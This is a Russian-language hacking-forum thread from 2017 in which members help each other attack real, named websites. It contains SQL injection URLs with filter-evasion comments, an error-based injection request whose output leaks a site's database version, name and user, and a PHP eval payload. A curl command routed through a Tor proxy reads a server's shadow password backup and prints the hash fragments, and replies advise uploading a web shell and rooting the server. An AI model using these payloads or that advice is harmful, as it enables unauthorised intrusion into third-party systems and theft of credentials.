ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.03.2017, 00:31
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Код:
Code:
http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41','42','43','44','45','46','47','48','49','50','51','52','53','54','55','56','57','58','59','60','61','62','63','64','65',66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180+--+
Хелп, нужно вывод
Не стоит забывать, что иногда параметры можно передавать одинаково как через GET, так и через POST, в котором зачастую ничего не фильтруется!
Код:
Code:
POST /en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b HTTP/1.1
Host: www.men-defencetec.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
tx_men_pi1[detail]=(1)--~(select*from(select(concat_ws(0x3a,@@version,database(),user()))n)f)#
Результат:
Сообщение от None
array(4 items)
caller => 'TYPO3\CMS\Core\Database\DatabaseConnection::sql_q uery' (53 chars)
ERROR => 'BIGINT value is out of range in '-(~((select '
5.6.27-log:mendefence1:mendefe
nce.1@www1.customers.omc.net
' from dual)))'' (119 chars)
|
|
|

24.03.2017, 14:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 1126
Репутация:
0
|
|
assert(stripslashes($_REQUEST['p']));
Подскажите кто-нибудь как через assert пролиться? Не пойму как он работает
|
|
|
|

24.03.2017, 15:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
eval($_REQUEST[x]);&x=phpcredits();
|
|
|
|

27.03.2017, 21:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от Gorev
Gorev said:
↑
ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача
Код:
Code:
$ curl -s -k --proxy socks5://127.0.0.1:9150 'http://*.com/ajax/*.php?UserID=1+union+select+1,2,3,load_file%280x2f6574632f736861646f772e62616b%29,5,6,7,8,9%23' | perl -lane '~s/\\n/\n/g;print' | tail -n 2 | perl -lane '~/[^:]+:(.{15})/;print $1'
$1$piXULrQ7$R3T
$1$piXULrQ7$R3T
shadow.bak
|
|
|
|

01.04.2017, 18:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 3552
Репутация:
0
|
|
Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера
P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?
|
|
|
|

01.04.2017, 21:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 60408
Репутация:
0
|
|
Сообщение от l0mt1k
l0mt1k said:
↑
Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера
P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?
можно. Можно к примеру попробовать рутнуть сервер.
$uname -a
p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.
|
|
|
|

03.04.2017, 19:41
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме: 23696
Репутация:
-4
|
|
PHP код:
PHP: [COLOR="#000000"]$var = $_POST['value']; $var = addslashes( $var ); $var = stripslashes($var); $var = str_replace( "[COLOR="#0000BB"][/COLOR]", "?>", $var ); $var = mysqli_real_escape_string($var);
############ # v1. query( "UPDATE comment set text='$var');
# v2. query( "INSERT INTO comment text='$var' WHERE id = '1'); [/COLOR]
Ребят, есть варианты провести инъекцию?
|
|
|

04.04.2017, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 60408
Репутация:
0
|
|
Сообщение от qqq1457
qqq1457 said:
↑
c74a0c532a2dd95bc284c40386244e61 что за алгоритм хеша? здесь зашифрована цифра 1
(это не MD5)
Вам в другой тред
|
|
|
|

05.04.2017, 13:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 60408
Репутация:
0
|
|
Сообщение от slva2000
slva2000 said:
↑
PHP код:
PHP: [COLOR="#000000"]$var = $_POST['value']; $var = addslashes( $var ); $var = stripslashes($var); $var = str_replace( "[COLOR="#0000BB"][/COLOR]", "?>", $var ); $var = mysqli_real_escape_string($var);
############ # v1. query( "UPDATE comment set text='$var');
# v2. query( "INSERT INTO comment text='$var' WHERE id = '1'); [/COLOR]
Ребят, есть варианты провести инъекцию?
mysqli_real_escape_string
а вы как думаете?
|
|
|
|

05.04.2017, 14:02
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
помогите вывод сделать, тайм бейс не крутит(
Код:
Code:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|